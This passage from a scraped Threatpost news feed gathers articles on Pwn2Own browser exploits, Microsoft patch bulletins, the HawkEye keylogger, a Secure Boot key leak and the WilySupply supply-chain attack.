Lee was home fulfilling a military obligation, a promise that kept him from seeing his Internet Explorer 11 exploit come up short Thursday morning.\n\nHP\u2019s Zero Day Initiative, sponsors of the event, said they bought the vulnerability regardless, and worked with the researchers on breaking down the details. The particulars would also be shared with Microsoft as is customary with all bugs purchased by ZDI, sharing them with the affected vendors.\n\nRegistrants at Pwn2Own have 30 minutes to demonstrate their exploit and verify it works by executing the calculator application on the underlying system. In this case, Lee\u2019s exploit was chasing down a vulnerability in IE 11 on a fully patched 64-bit Windows 8.1 machine. A successful exploit would have been worth $100,000.\n\nGenerally, entrants in Pwn2Own withdraw if there are difficulties with their exploits. On Tuesday, Microsoft rolled out another patch for Internet Explorer. The cumulative rollup, a regular Patch Tuesday update, repaired a zero-day in Internet Explorer 10 being used in targeted attacks, including Operation SnowMan targeting the U.S. Veterans of Foreign Wars and a separate attack on a French aerospace manufacturer. It was not disclosed whether the patch affected the Lee exploit.\n\nThe failure of Lee\u2019s exploit was in stark contrast to others demonstrated to that point, including one by German researcher Sebastian Apelt of Siberas who succeeded against IE 11. Apelt\u2019s exploit worked in less than a minute and was good for $100,000. Earlier on Thursday, a pair of Chinese hackers from the Keen Team successfully exploited a zero-day vulnerability in Apple\u2019s Safari browser to gain control of a Macbook running OS X Mavericks. That exploit was worth $65,000 and the members of Keen Team announced they would donate a portion of that to Malaysian charities.\n\nSoon after the IE setback, Pwn2Own regular George Hotz took down Firefox to collect a $50,000 prize. Hotz is perhaps better known for his jailbreaking exploits against the iPhone and the PlayStation gaming console. Hotz\u2019s attack against Firefox was the fourth time zero-days were exploited in the Mozilla browser during the two-day event.\n\nHackers from French exploit vendor Vupen took down both Internet Explorer and Firefox on Wednesday as part of a $350,000 haul. Vupen also beat Adobe Reader and Flash. On Thursday, Vupen has another exploit for Chrome worth another $100,000. Once the Keen Team popped Safari today, Vupen withdrew its Safari bug. It also withdrew its Java entry on Wednesday.\n\nVupen founder Chaouki Bekrar said his researchers prepared for two months in advance on Pwn2Own and had little trouble with IE 11 yesterday, using a a use-after-free vulnerability combined with an \u201cobject confusion\u201d to bypass the IE sandbox, Bekrar said.\n\n\u201cIt\u2019s definitely getting harder to exploit browsers, especially on Windows 8.1,\u201d Bekrar said. \u201cExploitation is harder and finding zero-days in browsers is harder.\u201d\n\nVupen\u2019s successful exploit of Firefox on Wednesday also took advantage of a different use-after-free zero day to bypass ASLR and DEP memory protections in Windows. Bekrar said the bug was found through the use of fuzzers against 60 million test cases.\n\n\u201cThat proves Firefox has done a great job fixing flaws; the same for Chrome,\u201d Bekrar said. \u201cChrome has the strongest sandbox, so that\u2019s even more difficult to create exploits for.\u201d\n\nZDI announced prior to the event it would buy all the Pwn2Own bugs at a price of close to $1.1 million.\n", "cvss3": {}, "published": "2014-03-13T19:33:53", "type": "threatpost", "title": "IE 11 Stands Up to Pwn2Own Exploit Attempt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-13T23:33:53", "id": "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "href": "https://threatpost.com/ie-11-stands-up-to-pwn2own-exploit-attempt/104786/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:39", "description": "Microsoft issued nine bulletins fixing 16 vulnerabilities in the July 2012 edition of Patch Tuesday. Three of the bulletins received Microsoft\u2019s most severe \u2018critical\u2019 rating, while the remaining six were deemed merely \u2018important.\u2019\n\nFirst and foremost among the critical patches is [MS12-043](<http://go.microsoft.com/fwlink/?LinkID=254824>), a fix for the publicly disclosed and widely publicized XML core services vulnerability that was [actively exploited last month](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>). Affecting Microsoft Windows, Office, Developer Tools and Server Software, it allowed attackers to execute code remotely after tricking victims into visiting a malicious website in Internet Explorer.\n\n[MS12-044](<http://go.microsoft.com/fwlink/?LinkId=254377>), also critical, is a cumulative security update for Internet Explorer resolving two privately reported bugs that, if unpatched, could allow an attacker to remotely execute code if a user visits a specially crafted webpage using Internet Explorer. Successful exploitation could grant the attacker user-rights, which, as always, will be more troublesome for users who operated with administrative rights.\n\nThe final critical bulletin, [MS12-045](<http://go.microsoft.com/fwlink/?LinkId=254441>), resolves one privately disclosed vulnerability in the data access components of Windows. Like the previous bulletin, this could potentially lead to remote code execution if the user visits a specially crafted website and allow the attacker to gain the same user rights as the current user.\n\nThe remaining \u2018important\u2019 bulletins resolve 12 vulnerabilities altogether, specifically, one bug in Visual Basic for Applications and another in the Windows Shell that could allow for remote code execution. The fix also covers two elevation of privilege vulnerabilities in Windows Kernel-Mode Drivers, six in SharePoint, and one more in Office for Mac, in addition to an information disclosure bug in TLS.\n\nYou can find the entire TechNet announcement [here](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-10T19:23:26", "type": "threatpost", "title": "Three Critical Fixes in July Microsoft Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:28", "id": "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "href": "https://threatpost.com/three-critical-fixes-july-microsoft-patch-tuesday-071012/76785/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:26", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07055731/xps2.jpg)](<https://threatpost.com/xp-sp2-will-soon-be-hackers-candy-store-071210/>)Unless thousands of companies still using Windows XP SP2 computers \nsuddenly stop procrastinating, hackers are going to be in seventh heaven come July 13. [Read the full article](<http://lastwatchdog.com/hackers-nirvana-horizon-microsofts-ends-patching/>). [The Last Watchdog]\n", "cvss3": {}, "published": "2010-07-12T18:06:21", "type": "threatpost", "title": "XP SP2 Will Soon Be Hacker's Candy Store", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:25:36", "id": "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "href": "https://threatpost.com/xp-sp2-will-soon-be-hackers-candy-store-071210/74200/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:04", "description": "Microsoft announced today it is suing Britain\u2019s second-largest electronics retailer Comet for allegedly creating and selling more than 94,000 back-up discs of its Windows Vista and Windows XP product.\n\nComet Group PLC allegedly produced counterfeit versions of the software in a factory in Hampshire before selling them in dozens of storefronts for \u00a314.99 each (roughly $23) across the U.K.\n\n\u201cComet\u2019s actions were unfair to customers. We expect better from retailers of Microsoft products \u2013 and our customers deserve better, too,\u201d said David Finn, associate general counsel for Microsoft\u2019s Worldwide Anti-Piracy and Anti-Counterfeiting division in a [press release issued today](<http://www.microsoft.com/Presspass/press/2012/jan12/01-04CometPR.mspx?rss_fdn=Press%20Releases>).![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065006/comet.jpg)\n\nAccording to a report in [The Guardian](<http://www.guardian.co.uk/technology/2012/jan/04/microsoft-sue-comet-windows-discs>), Comet sold the discs between March 2008 and December 2009 and potentially made the company more than \u00a31.4 million, or $2.2 million.\n\nComet plans to contest Microsoft\u2019s claim, reasoning that in producing the discs, they acted in the best interests of their customers and according to a [statement posted to their site](<http://press.comet.co.uk/index.php?cID=330&cType=news>) \u201cdid not infringe Microsoft\u2019s intellectual property.\u201d\n\nWhile it\u2019s currently owned by French company Kesa Electricals PLC, Comet is said to be in the process of being sold to a private investment partnership lead by OpCapita LLP.\n", "cvss3": {}, "published": "2012-01-04T20:41:33", "type": "threatpost", "title": "Microsoft Sues British Electronic Dealer in Alleged Counterfeit Scam", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:03", "id": "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "href": "https://threatpost.com/microsoft-sues-british-electronic-dealer-alleged-counterfeit-scam-010412/76059/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "[![Microsoft tool](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064907/microsoft_tool.jpg)](<https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/>)Microsoft has released a beta version of a new tool that can help victims of malware attacks recover from ugly infections, even if they don\u2019t have the ability to reach the Internet. The Windows Defender Offline tool enables users to clean their systems of malware from a CD or other removable media.\n\nIn some ways, the new tool is a throwback to the bygone days of computing and viruses when the malware universe was small enough that all of the definitions to combat it could fit on a floppy disk. Back then, users would often have a rescue disk that could help them boot their PC in the event of a messy malware infestation. Microsoft\u2019s [Windows Defender Offline](<http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline>) uses the same idea, by enabling users to download a large definition file and then transfer it to a USB drive, CD or other portable medium.\n\nThere are some pernicious classes of malware, including some rootkits and ransomware programs, that will prevent users from accessing the Internet or doing any kind of normal operations on their PCs. In those cases, it can be difficult or impossible for a user to run a system scan with installed antimalware applications or run a scan from the Web.\n\nA user who finds herself in such a situation would be able to boot her PC from the CD or USB driver containing the offline tool and then proceed with the malware cleaning.\n\n\u201cWindows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it\u2019s important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks,\u201d Microsoft\u2019s documentation for the Windows Defender Offline tool says.\n\nThe new tool is currently in beta form, but it\u2019s available for download from Microsoft\u2019s site now.\n", "cvss3": {}, "published": "2011-12-09T12:57:19", "type": "threatpost", "title": "Microsoft Unveils New Windows Defender Offline Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:11", "id": "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "href": "https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/75979/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-08T12:00:06", "description": "The HawkEye malware kit and information-stealer has been spotted in a newfound slew of campaigns after a recent ownership change.\n\nWhile the keylogger has been in continuous development since 2013, in December a thread on a hacking site noted an ownership change, after which posts on hacking forums began to appear, selling new versions of the kit. \u201cHawkEye Reborn v9\u201d sports new anti-detection features and other changes, researchers said.\n\n\u201cRecent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward,\u201d said Edmund Brumaghin and Holger Unterbrink, researchers with Cisco Talos, in a [Monday analysis.](<https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html>) \u201cHawkEye has been active across the threat landscape for a long time, and will likely continue to be leveraged in the future as long as the developer of this kit can monetize their efforts.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThis latest version of HawkEye is sold through a licensing model (meaning that purchasers gain access to the software and future updates based on a varying tiered pricing model), and is being marketed on hacking sites as an \u201cadvanced monitoring solution.\u201d\n\n[![Hawkeye keylogger](https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091412/hawkeye-3-300x141.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091412/hawkeye-3.png>)\n\n\u201cThe current developer of the HawkEye Reborn keylogger/stealer is continuously adding support for different applications and software platforms to facilitate the theft of sensitive information and account credentials,\u201d researchers told Threatpost. \u201cThe malware has recently undergone changes to the way in which it is obfuscated and additional anti-analysis techniques have been implemented as well.\u201d\n\nHawkEye Reborn v9 also now features a terms-of-service agreement: While the seller says that the keylogger should only be used on systems with permission, the agreement also explicitly forbids scanning of HawkEye Reborn v9 executables using antivirus software.\n\nIn a further attempt \u201cto minimize the likelihood that anti-malware solutions will detect HawkEye Reborn binaries,\u201d researchers said that the keylogger also now comes with several anti-analysis features, such as an anti-debugging thread process and the ability to disable certain antivirus-related programs.\n\nIn tandem with the ownership change of HawkEye, researchers observed a slew of campaigns from late 2018 into 2019 that involve this most recent version of the malware.\n\n[![Hawkeye keylogger](https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091515/hawkeye-2-300x232.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/16091515/hawkeye-2.jpg>)\n\nThe malicious email campaigns include messages that appear to be requesting invoices, bills of materials, order confirmations and other things related to normal corporate functions. However, the emails actually arrive with malicious Microsoft Excel attachments (which exploit an arbitrary code execution bug in Microsoft Office, CVE-2017-11882), as well as RTF (Rich Text Format) or Doc files.\n\nOnce a victim clicks on the attachment, the email-senders have intentionally made the contents of the documents look blurry \u2014 and the user is prompted to enable editing to have a clearer view of the contents. After they do that, the injection process begins, with the HawkEye keylogger being downloaded.\n\nThe malware then snatches up sensitive information, such as the system information, passwords from common web browsers, clipboard contents, desktop screenshots, webcam pictures and account credentials.\n\nThreatpost has reached out to Cisco Talos researchers for further details about the campaigns, including how many there have been, and what victims have been targeted.\n\nMoving forward, researchers warn that HawkEye will continue to evolve. But more significantly, the malware kit represents yet another offering that reduces the barrier for entry for bad actors, who may not necessarily have the programming skills to carry out sophisticated hacks.\n\n\u201cIn many cases, the adversaries leveraging these tools do not need to possess programming skills or in-depth computer science expertise, as they are now being provided as commercial offerings across the cybercriminal underground,\u201d researchers said.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-16T14:34:54", "type": "threatpost", "title": "Malspam Campaigns Distribute HawkEye Keylogger, Post Ownership Change", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-04-16T14:34:54", "id": "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "href": "https://threatpost.com/hawkeye-keylogger-malspam-campaigns/143807/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:10:26", "description": "[By Robert Westervelt, SearchSecurity.com](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>)\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053323/ie_81.jpg)](<https://threatpost.com/internet-explorer-8-includes-bevy-security-features-032009/>)Microsoft has officially released [Internet Explorer 8 today](<http://www.microsoft.com/windows/internet-explorer/default.aspx>) [microsoft.com] with a number of new security features to improve privacy and protect against phishing and cross-site-scripting attacks. [From the article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>):\n\nMicrosoft is trying to mitigate some of the common issues with a cross-site-scripting (XSS) filter, which protects against Type-1 XSS attacks. The filter in IE 8 monitors all of the requests and responses made by the browser and automatically disables XSS attacks when they\u2019re detected. When an attack is blocked, users will be alerted with a modified version of the requested page. The browser also has a built-in feature that analyzes URL strings and highlights the top-level domain in the address bar to prevent a person being victimized by website spoofing.\n\nAnd more:\n\nMicrosoft also addressed the growing need for privacy while browsing certain websites. A new feature called InPrivate browsing mode, enables users to control whether IE saves a record of their browsing session. Similar to the Incognito mode in Google\u2019s Chrome browser, InPrivate in IE 8 won\u2019t save cookies, passwords, browsing history or any other record if it is enabled. Microsoft said InPrivate also prevents form data, passwords and temporary Internet files from being stored, keeping the session completely private.\n\nIE 8 also includes a feature to block clickjacking attacks, preventing users from clicking an obscured or hidden Web element. The feature detects a website header designed by Web developers that declares how many frames a sensitive Web page can contain. Microsoft says the technique is not perfect, but will substantially mitigate the threat of clickjacking on sensitive websites.\n\nRead [the full article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1351376,00.html?track=sy160>) [techtarget].\n", "cvss3": {}, "published": "2009-03-20T17:17:02", "type": "threatpost", "title": "Internet Explorer 8 includes a bevy of security features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:37", "id": "THREATPOST:215398BCE165265631436077B4E79ECB", "href": "https://threatpost.com/internet-explorer-8-includes-bevy-security-features-032009/72388/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:56", "description": "**Update **Opponents of the government\u2019s constant talk about [intentional backdoors](<https://threatpost.com/harvard-paper-rebuts-going-dark/116095/>) and [exceptional access](<https://threatpost.com/crypto-leaders-exceptional-access-will-undo-security/113639/>) finally may have their case study as to why it\u2019s such a bad idea.\n\nTwo researchers operating under aliases ([my123](<https://twitter.com/never_released>) and [slipstream](<https://twitter.com/TheWack0lian>)) this week posted a [report](<https://rol.im/securegoldenkeyboot/>)\u2014accompanied by a relentless chiptune\u2014that reveals how Microsoft inadvertently published a Secure Boot policy that acts as a backdoor that allows for the UEFI firmware feature to be disabled and for anyone to load unsigned or self-signed code.\n\nThe gaffe, meant to be a legitimate debugging and testing feature, affects Windows-based devices with Secure Boot on by default; Secure Boot checks that any components loaded during boot are [digitally signed (by Microsoft) and verified](<https://blogs.technet.microsoft.com/dubaisec/2016/03/14/diving-into-secure-boot/>). As a result of the error, users can run self-signed binaries on affected devices or install non-Windows operating systems.\n\nWorse, the researchers said, is that it\u2019s unlikely Microsoft can clean up this mess. For two months running, Microsoft has published security bulletins on [Patch Tuesday](<https://threatpost.com/windows-pdf-library-flaw-puts-edge-users-at-risk-for-rce/119773/>) that includes updates to Secure Boot. Neither, according to my123 and slipstream, has fully addressed this issue.\n\n\u201cIt\u2019d be impossible in practise for MS to revoke every bootmgr earlier than a certain point, as they\u2019d break install media, recovery partitions, backups, etc,\u201d the researchers wrote in their report.\n\n~~Microsoft did not respond to a request for comment in time for publication.~~\n\n\u201cThe jailbreak technique described in the researchers\u2019 report on August 10 does not apply to desktop or enterprise PC systems. It requires physical access and administrator rights to ARM and RT devices and does not compromise encryption protections,\u201d_ _a Microsoft spokesperson told Threatpost via email.\n\nMicrosoft\u2019s first pass at fixing this in June, [MS16-094](<https://technet.microsoft.com/en-us/library/security/ms16-094.aspx>), blacklisted most, but not all of the relevant policies, the researchers said. An attacker would still be able to manipulate bootmgr, which manages boot sequences in Windows, in order to bypass Secure Boot. The second patch, released this week in [MS16-100](<https://technet.microsoft.com/en-us/library/security/ms16-100.aspx>), says it revokes bootmgrs, and updates the Secure Boot dbx, which includes the addition of new SHA256 hashes. The researchers, however, said this patch may not be complete as well.\n\n\u201cI checked the hash in the signature of several bootmgrs of several architectures against this list, and found no matches,\u201d slipstream said. \u201cSo either this revokes many \u2018obscure\u2019 bootmgrs and bootmgfws, or I\u2019m checking the wrong hash.\u201d\n\nWith the policy now available online, Windows devices, including Windows RT, HoloLens, Windows Phone, maybe Surface Hub, the researchers said, can have their versions of Secure Boot disabled.\n\n\u201cA backdoor, which MS put in to secure boot because they decided to not let the user turn it off in certain devices, allows for secure boot to be disabled everywhere! You can see the irony,\u201d the researchers wrote. \u201cAlso the irony in that MS themselves provided us several nice \u2018golden keys\u2019 (as the FBI would say) for us to use for that purpose :)\u201d\n\nThe irony is not lost on anyone who was watching the Apple-FBI saga from early this year during which the government asked Apple to create an intentionally weakened version of iOS that would disable or bypass existing protections on a terrorist\u2019s iPhone that would wipe the phone after x-number of missed passcode guesses.\n\nApple fought the FBI in court, challenging the constitutionality of the government\u2019s demand, which was eventually dropped after the FBI found an unnamed third-party who could crack the phone.\n\nThe Secure Boot report calls out the FBI specifically.\n\n\u201cAbout the FBI: are you reading this? If you are, then this is a perfect real world example about why your idea of backdooring cryptosystems with a \u2018secure golden key\u2019 is very bad!,\u201d the researchers wrote. \u201cSmarter people than me have been telling this to you for so long, it seems you have your fingers in your ears. You seriously don\u2019t understand still? Microsoft implemented a \u2018secure golden key\u2019 system. And the golden keys got released from MS own stupidity. Now, what happens if you tell everyone to make a \u201csecure golden key\u201d system? Hopefully you can add 2+2\u2026\u201d\n\n_This article was updated Aug. 11 with a comment from Microsoft. _\n", "cvss3": {}, "published": "2016-08-11T11:31:39", "type": "threatpost", "title": "Microsoft Mistakenly Leaks Secure Boot Key", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-08-16T11:52:46", "id": "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "href": "https://threatpost.com/microsoft-mistakenly-leaks-secure-boot-key/119828/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:44", "description": "Microsoft said a recent attack it calls [Operation WilySupply](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) utilized the update mechanism of an unnamed software editing tool to infect targets in the finance and payment industries with in-memory malware.\n\nThe unnamed editing tool was used to send unsigned malicious updates to users in targeted attacks, according to a report published Thursday.\n\n\u201cWhile their software supply chain served as a channel for attacking other organizations, they themselves were also under attack,\u201d said Elia Florio, senior security software engineer, with Windows Defender ATP Research Team.\n\nIt\u2019s unclear just how many affected parties there were and when the attacks took place. However, Florio said the attacks were selective and purposely went after only the \u201cmost valuable targets\u201d in an effort to avoid detection.\n\n\u201cWe believe that the activity group behind Operation WilySupply is motivated by financial gain. They compromise third-party software packages delivered through updaters and other channels to reach victims who are mostly in the finance and payment industries,\u201d Florio wrote.\n\nHe said Microsoft began investigating the suspicious activity after computers using the updater were red-flagged by Windows ATP. \u201cWindows Defender ATP initially called our attention to alerts flagging suspicious PowerShell scripts, self-deletion of executables, and other suspect activities,\u201d Florio wrote.\n\nA forensic analysis of the _Temp Folder _on one of the targeted systems revealed the legitimate third-party updater running as service. However, closer inspection revealed the updater also had downloaded an unsigned, low-prevalence executable just before the malicious activity was observed, according to Florio.\n\n\u201cThe downloaded executable turned out to be a malicious binary (Rivit) that launched PowerShell scripts bundled with the Meterpreter reverse shell, which granted the remote attacker silent control,\u201d Florio wrote. \u201cThe malware binary, named by the cybercriminals _ue.exe_, was a small piece of code with the sole purpose of launching a Meterpreter shell.\u201d\n\nMeterpreter is a legitimate pen-testing tool packaged with the Metasploit framework and can be used to carry out in-memory or fileless attacks. Meterpreter attaches itself to a process and is capable of carrying out in-memory DLL injections. It\u2019s one of several open-source tools such as Lazagne that allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary\u2019s control server. In-memory or fileless attacks, Florio said, are a [fast growing trend among cybercriminals](<https://threatpost.com/hard-target-fileless-malware/125054/>).\n\nAttackers, Florio said, were taking advantage of the trusted relationship within the context of the software supply chain. The victims were unaware that a malicious third-part had infiltrated the remote update channel of the supply chain.\n\nSelf-updating software has been targeted in the past on a number of occasions, points out Microsoft. Unrelated incidents include adversaries targeting Altair Technologies\u2019 EvLog update process, the auto-update mechanism for South Korean software SimDisk and the update server used by ESTsoft\u2019s ALZip compression application, according to researchers.\n\nNoteworthy to the attack was the fact adversaries conducted advanced recon that included qualifying systems with tools such as .NET, IPCONFIG, NETSTAT, NLTEST, and WHOAMI, Florio said.\n\nAdditional techniques, tactics and procedures Florio noted included; memory-only payloads assisted by PowerShell and Meterpreter running in rundll32; Migration into long-living processes, such as the Windows Printer Spooler or _spoolsv_._exe_; use of common tools like Mimikatz and Kerberoast to dump hashes; ateral movement using Windows Management Instrumentation (WMI), specifically the _WMIC /node_ command; and persistence through scheduled tasks created using SCHTASKS and AT commands.\n\nTips on protection from such attacks include hardening defenses with strong encryption used in update channels, putting script and configuration files in signed containers and adopting Security Development Lifecycle best practices, according to Florio.\n", "cvss3": {}, "published": "2017-05-05T14:11:31", "type": "threatpost", "title": "Supply Chain Update Software Unknowingly Used in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-05-05T18:11:31", "id": "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "href": "https://threatpost.com/supply-chain-update-software-unknowingly-used-in-attacks/125483/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:45", "description": "[![Windows patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065215/windows_patch_0_1.jpg)](<https://threatpost.com/microsoft-fixes-critical-ie-windows-bugs-february-patch-tuesday-021412/>)Microsoft released nine security updates Tuesday, four critical; five important, fixing 21 different holes in various applications with its February patch release. The four critical fixes deal with vulnerabilities in the company\u2019s Windows, Internet Explorer, .NET Framework and Silverlight programs that could allow remote code execution if left unpatched.\n\nMicrosoft considers MS12-010 and MS120-013 as the update\u2019s top priority bulletins.\n\nMS12-010 addresses four issues in Internet Explorer, two critical, one important and one moderate. The two critical issues could allow an attacker the same rights as a logged-on user while the other two could allow an attacker to view content remotely or via the browser\u2019s processed memory.\n\nIn MS12-010, if a user were to open a specially crafted media file in Windows, it could lead to a buffer overflow in the C++ Run-Time Library. Alexander Gavrun, working with TippingPoint\u2019s Zero Day Initiative, disclosed an issue with the vulnerability, yet Microsoft claims it isn\u2019t actively being exploited in the wild.\n\nSome of the other fixes involve a flaw (MS12-015) in the less-used Visio Viewer where an attacker could gain access if a specially crafted Visio file was opened. A vulnerability (MS12-014) in Indeo Codec could allow an attacker to run arbitrary code as the logged on user if an .AVI file was opened in the same directory as a .DLL file. Similarly, in Windows\u2019 Color Control Panel, if a user opened an .ICM or .ICC file in the same directory as a .DLL file, an attacker could gain control of their computer (MS12-012).\n\nTwo of the vulnerabilities marked \u2018Important\u2019 by Microsoft deal with flaws in Windows\u2019 Ancillary Function Driver (MS12-009) and Microsoft Office and Server\u2019s Sharepoint (MS12-011). Both of these vulnerabilities could allow elevation of privilege, according to the company, if an attacker ran a malicious application for MS12-009 or encountered an XSS vulnerability in Sharepoint (MS12-011).\n\nThe monthly update is Microsoft\u2019s last batch of updates before this year\u2019s Pwn2Own competition, an annual hacking contest held the first week of March at Vancouver\u2019s [CanSecWest Conference](<http://cansecwest.com/>). Each year entrants attempt to hack browsers like Microsoft\u2019s Internet Explorer and Mozilla\u2019s Firefox in the challenge run by TippingPoint.\n\nIt was around this time last year that [Stephen Fewer](<https://threatpost.com/pwn2own-winner-stephen-fewer-031011/>), now with Harmony Security, [bypassed Internet Explorer 8](<https://threatpost.com/apple-safari-and-internet-explorer-8-go-down-pwn2own-iphone-next-031011/>)\u2019s DEP and ASLR to execute a successful exploit in the browser on Windows 7.\n", "cvss3": {}, "published": "2012-02-14T20:17:07", "type": "threatpost", "title": "Microsoft Fixes Critical IE, Windows Bugs with February Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:48", "id": "THREATPOST:FCF1B008BD9B10ADDA0703FDB9CBAA04", "href": "https://threatpost.com/microsoft-fixes-critical-ie-windows-bugs-february-patch-tuesday-021412/76213/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yanex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, 